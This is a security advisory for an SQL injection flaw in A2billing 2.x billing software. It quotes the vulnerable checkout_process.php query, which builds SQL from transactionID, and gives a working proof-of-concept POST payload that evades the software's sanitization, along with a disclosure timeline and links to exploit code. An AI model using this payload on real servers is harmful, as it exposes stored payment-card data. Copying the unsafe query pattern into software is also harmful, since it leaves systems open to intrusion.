A2billing 2.x SQL Injection# Title : A2billing 2.x , Sql injection vulnerability
# Vulnerable software : A2billing 2.x
# Author : Ahmed sultan (0x4148)
# Email : [email protected]
# Linkedin : https://www.linkedin.com/in/0x4148/
If you're looking for deep technical stuff , overcoming sanitization/hardening . . etc you can check out the full writeup at https://0x4148.com/2016/10/28/a2billing-all-versions-2-1-1-sql-injection-exploit/
A2billing is vulnerable to sql injection attack resulting from not enough sanitization of several inputs including transactionID
The sanitization proccess differ from version to another , but the concept is the same ,
I demonstrated bypassing the last version (2.1.1) , but still all versions till the moment are vulnerable as well with just little bit different modifications
File : agent/public/checkout_process.php
getpost_ifset(array('transactionID', 'sess_id', 'key', 'mc_currency',
'currency', 'md5sig', 'merchant_id', 'mb_amount', 'status', 'mb_currency',
'transaction_id', 'mc_fee', 'card_number'));
...................................................
// Status - New 0 ; Proceed 1 ; In Process 2
$QUERY = "SELECT id, agent_id, amount, vat, paymentmethod, cc_owner,
cc_number, cc_expires, creationdate, status, cvv, credit_card_type,
currency " .
" FROM cc_epayment_log_agent " .
" WHERE id = ".$transactionID." AND (status = 0 OR (status = 2 AND
$NOW_2MIN))";
$transaction_data = $paymentTable->SQLExec ($DBHandle_max, $QUERY);
POC :
Sending POST request : transactionID=456789111111 unise//**lectonselinse//**rtect 1,2,3,4,0x706c75676e706179,6,7,8,9,10,11,12,13-//**--&sess_id=4148key=636902c6ed0db5780eb613d126e95268
to : https://HOST/a2billing/agent/Public/checkout_process.php
will result in redirection of the application and the Location header will contain our decoded payment module which was used in the query "plugnpay" , which indicate successful injection
Full exploitation demo : https://www.youtube.com/watch?v=8dfdZCmPGWA
Exploit timeline :
01/10/2016 : vulnerability reported to vendor
06/10/2016 - 12/2016 : talks talks talks with promises of fixing ASAP
04/09/2017 : Public release
Full exploit code is attached <loose code for demonstration purposes only>
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42615.zip
Thanks fly to R1z clan :)
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum